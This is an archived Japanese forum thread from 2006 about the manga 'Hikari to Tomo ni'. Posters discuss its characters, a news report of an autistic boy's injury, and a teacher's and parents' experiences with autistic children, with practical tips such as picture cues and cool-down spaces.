なんでも何度か休載があったようですが、11巻の発売が予想される時期を
教えていただけないでしょうか。

92 :花と名無しさん:2006/11/02(木) 00:40:50 ID:???O
さっきニュースで自閉症の男の子を用具室に閉じ込めて
(この辺記憶あいまい)男の子が窓から転落
っていうのを見て郡司先生を思い出した

93 :花と名無しさん:2006/11/02(木) 01:16:21 ID:???0
>>92
>>60にあったやつだ(リンク消えてるけど)

94 :花と名無しさん:2006/11/02(木) 06:56:18 ID:+FxaNUrA0
これ泣けた

95 :花と名無しさん :2006/11/03(金) 10:57:21 ID:j9prTmLK0
>92 私もニュース見ました。

倉庫に入っているので「出なさい」と言ったが、また入ってしまったので、
「そんなに入りたいならずっと入っていなさい」とドアを閉めたそうです。
見知らぬ密室に一人きりになりパニックを起こすというのは、
察するに余りあるハズと有識者もコメントしていました。
そして、2階の窓まら5メートル下へ飛び降りたと思われる・・とのこと。
担任は当初、上履きの片方が倉庫の中に落ちていたと証言したが、
実際は窓の下だったとあとで、言いなおしている。
ケガの内容は奥歯6本が砕けて、アゴの骨にも損傷と重傷。
その後の治療も相当に負担だったと思われる。

私も郡司先生を思い浮かべました。

96 :花と名無しさん:2006/11/03(金) 16:35:32 ID:???0
私は郡司先生もお姑さんも嫌いになれないな
二人とも、凄く孤独な人だよね
郡司先生は、理想に燃えてたのに
一生懸命だった若い頃に生徒や保護者に槍玉にあげられたりしたし、
娘さんには自分の人生否定されちゃったし
凄く可哀相だった。
お姑さんも一人ぼっちで、
「お金を出す時ぐらいしか誰も相手にしてくれないのね」
なんてタメイキつく立場だし。
それに、郡司先生からもお姑さんからも
他人事だった自閉症児に向き合う戸惑いが見えて
身近に感じたよ

我が子が自閉症児でなかったら、自分もこんな感じだったんだなと思う

97 :花と名無しさん:2006/11/04(土) 12:44:13 ID:???0
>「お金を出す時ぐらいしか誰も相手にしてくれないのね」

このシーンは姑の弱さや汚さが出ていて、人間を描いているという意味では
素直でいいシーンだと思う。人間キレイだけじゃないし。
もっともこれは自閉症関係なくこのお姑さんの考え方なんだと思うので
(何かで息子夫婦とぶつかればこんな風に思って自分を慰める)
私としては「こんな風に思われたらやだなあ〜」と思ってしまうよw
この後、ダンスとかで自分の人生を充実させようとしてるのは素敵だと思う。

旦那さんに先立たれたのは気の毒だし、一人で頑張ってきた大変さは
自分には分らないから、勝手な意見だけど。



98 :花と名無しさん:2006/11/08(水) 06:00:10 ID:???0
>>96
うん・・郡司先生「先生といっても青木先生から郡司先生までいるものな」
とかいわれるほど悪い先生じゃないと思うよ。
少なくとも体罰振るったりしなかったし、閉じ込め事件もわざとじゃないし・・

悪い教師っていうのはタイムリーな中学生の事件とかに出てくるような、
明らかに悪意むき出しの教師のことだと思うよ。
あと悪気なくてもメチャクチャ傷つけたりね。

定年間際の腰痛もちの先生にしては、よくやってくれたと思う。
ちょっと方向違ってたけど、いろいろやろうとしてたし・・


99 :花と名無しさん:2006/11/08(水) 06:14:26 ID:???0
私自身、アスペ児童教えてるけれども、
マンツーマン指導のときにズボンに手をつっこんでボリボリやられると、
悪気ないのはわかっていても高学年になると正直気持ち悪いと感じてしまう・・
年配の先生なら「いやらしい」っていう言葉が出てくるのも仕方ない気がする。
いいとはいわないけれども・・

亮くんも、ああしてみるとかわいいのに・・って思うけれども、
目の前で「先生のうちのお母さんいつ死ぬの?ねぇ死んだら泣くんでしょ?
エンエンエンって泣くんでしょ?ねぇねぇねぇ〜!!」
ってこっちが母親の病院に言った後だというのを知っていていわれると、
場の雰囲気を読めないんだとわかっていてもこみ上げてくるものはあるよ・・

・・こんな自分がイヤだけれども。

100 :花と名無しさん:2006/11/08(水) 08:04:02 ID:???0
>>99
お母さんのようなケースについては、むしろ普通に悲しんでみてもいいんじゃない?
アスペなら知能もあるんだし、それなりの年齢なんだし
理屈とかだけではなく、感情を見せるのも方法だと思う。
空気は読めなくて応用が出来なくても、自閉の人が出来る様になっていくのは
場面で覚えていくから。悲しい場面も教えていけば少しずつわかるようになるよ。
ニキさん(成人アスペの方)みたいに
「他人にも感情がある事を大人になってから知った。子供のうちに知りたかった」
と言う人も結構いるんだし。

101 :花と名無しさん:2006/11/08(水) 21:20:08 ID:???0
>>100
わざわざありがとうございます・・
その場その場で、そういうことを言うとほかの人は悲しい嫌な気持ちになるから
言ってはいけないと伝えているんですけどね・・
5分後には言ってます。
知的には知的障害とぎりぎり言えるかどうかというラインで難しいところです。

アスペすべてが彼のようでないことは分かっているけれども、
最近では正直うんざりしてきています。
彼に容姿のことなどでしつこく繰り返された泣き出した女の子や、
忌引きのあとに「ねぇねぇお前泣いたんだろ〜」のような発言を繰り返されて
怒り出した男の子の気持ちも分かりますし・・。
彼には障害があるからじゃ済まされないネタなんですよね。

理屈として本で読んで、この子達が誤解を受けやすく悪気がないんだと
分かっていても、
その場で繰り返し繰り返し指導しても分かるようにならない彼に、
どうしたらいいのかと迷っています。
親御さんも放置気味だし・・

今回の光君のようなことは彼でも問題になってきています。
その都度指導していますが、それこそ容姿端麗な光くんが
女性教諭の髪をいじっても問題にならなくても、
上のほうの方もおっしゃっていましたが標準以上の体型の男子生徒に
同じことをされたら怖いということも沢山ありますよね・・
それでなお、どう指導していけばいいのか、
「光とともに」を含め文献を漁り、お話を伺い、私も模索中です。

102 :花と名無しさん:2006/11/08(水) 22:58:37 ID:???0
>>101
ごめんなさい
うちの子の事じゃないと分かってても、ごめんなさいと言いたくなりました。
うちの子はアスペじゃなくて高機能の方なんだけど
本当に場の空気は読めないし、「ダメ」と言うと暴れたり、
禁止されている事を繰り返すし・・・
正直、一生この子と二人家に閉じこもってしまいたいと思います

まあ、現在四苦八苦している自分からあまり役に立たないかもしれないアドバイス
言葉じゃなく、字や絵で注意する
1日1個の約束をして、それを守れたら思いっきり褒める
毎日変えるのではなく、1週間ぐらい同じ約束で。
約束事は本人に決めさせる
これは、案外自信に繋がるんですよ

あまりしつく繰り返す時は、クールダウン用の場所を作って
そこで心をクールダウンさせるとか・・・
うちは先生に頼んで小さなクールダウン用の場所を作ってもらって
時々そこに入って心を落ち着かせてから出てくるようになってます

103 :花と名無しさん:2006/11/08(水) 23:08:58 ID:???0
アスペとか高機能は、ある程度の知能を持ってるからやっぱり辛いんだと思う
「ぼくは人とは違うんだ」とか
「ぼくは目立つんだ。目立ちたくないのに」とか
「こんなぼくをおかあさんは嫌いになる?」とか聞いてくる
お母さんはどんなあなたでも嫌いにならない、でもお友達はそうじゃない
お友達に嫌われたくないなら、自分がやられて嫌な事はしないようにと伝えるのが精一杯


104 :花と名無しさん:2006/11/08(水) 23:36:13 ID:???0
>>102
なんだか、そんな風に思わせてしまってこちらこそごめんなさい
102さんのように、親御さんが熱心なのはお子さんにも周囲の人にも
きっと伝わっていると思います

字や絵で注意する・・彼に使おうかどうしようか迷っていました
言葉として一応通じてはいるので、
そのイメージが頭に強く残りすぎはしないだろうかと・・
でも、約束事を本人に決めさせるというのはとてもよいですね
機会を得て試してみようと思います
そして、守れたら・・できるなら私も嫌いになりたくない(もちろん態度には仮にそう思っても絶対に出しませんが)、
ほめてあげようと思います。

クールダウンの必要を感じるときもあるのですが、
いわゆるパニックにならない限り学習は続けています。
いわゆる中堅以上の難関校ではありませんが、
障害特性も考えて私学の受験をするつもりのようで、
それであれば(そうでなくても)読み書き計算は卒業までに学年相当の半分くらいは
できるようになってほしいと考えています・・・

本当にどうもありがとうございました
・・・心のうちを話せて、また少し違う目で彼を見つめなおすことができるかもしれません。



105 :花と名無しさん:2006/11/09(木) 01:18:56 ID:???0
>99
亮くん?コミックの話じゃないのね?
実在の生徒さんの名前書くなんて、どうかしてない?

106 :102:2006/11/09(木) 17:05:56 ID:???0
>>105
原作の高機能もしくはアスペの疑いのある子は「亮太」だから
亮くんであってるよ
実在の生徒の名前じゃないでしょ
本だとそれなりに可愛かったりするけど、
現実となるとそうもいかないから。
経験上良く分かるよ

>>104
あなたの生徒さんの親御さん、もしかすると疲れ果ててるんじゃないかな?
実は、私も何度も放置したくなったし、原作の亮太くんのお母さんも
現実から逃げたがっていたしね。
だからどうなるもんじゃないけど、
相手の行動を良い方向に考えると少しは気が楽になると思います。
生徒さんを守るのと同じように、ご自分の心も守ってください
自分の心に優しくないと、他人に優しくするのは苦痛だと思うから。



107 :花と名無しさん:2006/11/09(木) 18:51:20 ID:???0
>>106
>>105読んで「あれ、亮太君っていたよね?」と思ってビックリしてた

108 :花と名無しさん:2006/11/10(金) 07:56:05 ID:???0
「ああしてみると」は「漫画で見ると」と言う意味だろうけど
具体的に書かず抽象的に書いてあると、一瞬悩むと思う。
わざと抽象的に書く事で現実の事を書いたのかと思われる可能性があるから。
漫画関係の板って文章に凝る人も結構いるからさ。

>>104
健常者でも「便所は右です」と「トイレマーク+→」の絵のどちらが
一発で分りやすいかといえば、絵の方ですよね。
アスペの人も同じです。
字が分ると言っても、優しい或いは分りやすい表現の方が入りやすい。
本人がバカにされているようで拒否をしたら、考えたほうがいいと思うけど。
先生向けの勉強会とかあったら参加すると具体的な方法を
沢山教えてくれると思いますよ。こういう勉強会などは熱心な所とそうでない所と
地域差があるので、あるかどうかはワカリマセンが。

109 :花と名無しさん:2006/11/27(月) 09:45:16 ID:???0
    /::::::::::::;.: --─---─-、:::::::::::::ヽ
    ./::::::::::::/ィC¨ヽ      \:::::::::::l
   /:::::::::/  └¬'´,   ィC¨ヽ';:::::::::!
  ./::::::::イ        / ,.  ヽ `¬┘';:::::::!
  l::::::::::::l       /ハ ハ }     ヾ::::j
  {::::{⌒l:!      / `   ' ヽ   V}
.  ';:::l ゝリ     l ,/ ̄¨ヽ  ',    }l
  ヾヽ__j     { {,. -−‐‐ヘ    {,l
    ヾ::::|   i  ヽ ヽェェェェェノ     {  
    }:::l   ヽ    ` ̄¨´   ノ   }
     ヾ;k    \_  __  ,/   }

110 :花と名無しさん:2006/12/02(土) 01:14:32 ID:pYhzSR8/0
保守

111 :花と名無しさん:2006/12/02(土) 13:18:41 ID:???0
今月発売分の話、セリフ中の「ニトロ」に注釈があったけど、
「爆発はしません。」なんてわざわざ書かなくたって…と思った。

112 :花と名無しさん :2006/12/27(水) 13:22:30 ID:???0
浮気。なんだか鬱展開だなぁ。

113 :花と名無しさん:2006/12/27(水) 21:02:05 ID:???0
浮気まで発展するかな…あんなに花音ラブなのに。
いいとこ幸子が二人でいるところをカンチガイするとか(「お歳暮」の伏線もあるし)。
姑が、そーいう女の子の存在を知って、幸子と光くんを切って
その子と再婚するように仕向けるとかいう展開だったら凄く嫌だ…。

でも今回、幸子の親の健康不安をネタに話してて、自分の健康を頼りにしてる描写があったけど、
あれが伏線で、凄い病気になる、みたいな展開だったりして。

114 :花と名無しさん:2006/12/28(木) 10:22:16 ID:???0
少なくともあの彼女とは浮気しないでしょう。
本気で浮気したいなら「上司にイヤガラセを受けていて
自分に色んな意味で憧れていて、浮気したらウザそう、別れるのも大変そう」
・・・そんな女性は避けるでしょw
部下の言葉にもあるし1巻でもあったけど、雅人は自分にとって
不利益な女性と付き合う事はしないようだし。
ましてモテるんだから、わざわざそういう女性を選ぶ必要はない。

私としては>>113さんが書いたような、姑関係の話に発展したら嫌だなあと思う。
お母さんも心臓の病気を抱えながら生きる事になるみたいで大変そうだし。


115 :花と名無しさん:2006/12/28(木) 12:49:22 ID:???O
>>113
そこまでお姑さんを悪者にして欲しくないなぁ
あれだけ協力的な雅人を育てたのはお姑さんなんだから
そこまで悪い人じゃないのでしょ

116 :花と名無しさん:2006/12/29(金) 23:01:29 ID:???0
>>115
うん、そう思う
なんだかんだいって花音ちゃんのこともすごい可愛がってるし、
光くんのことだって、心配しているからこそ(ちょっと違えていても)出てくる
キツい発言だと思う。
・・・なんかご都合主義で悪者にされているみたいでイヤだ・・
世間体を気にする人だからといって、嫁はともかくその親の嫌味まで言わせちゃうなんて・・
そんな悪い人じゃないと思う。本来は、だけど。

117 :花と名無しさん:2006/12/30(土) 22:24:17 ID:???0
>>115
>>116
現実として「実の息子(娘)相手」に愚痴や嫌味を言っちゃう位は
「悪い人」じゃなくてもあるんじゃね?
そりゃ息子の奥さんや奥さんの家族に直に言ったらどうかと思うけど。
家族なら愚痴を言っても我慢してくれるとか、
奥さんにそのまま伝えないでいてくれるとか(実際雅人は言わないし)
そういう甘えがあっても不思議じゃないと思う。

一応成人女性向きの雑誌だからさ。
表現的に暗黙の了解的な物があっても不思議じゃないと思うよ。
でも特定の事柄(障害だけでなく)を扱っている漫画は
子供でも読んでしまう可能性もあるんだけどね。

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)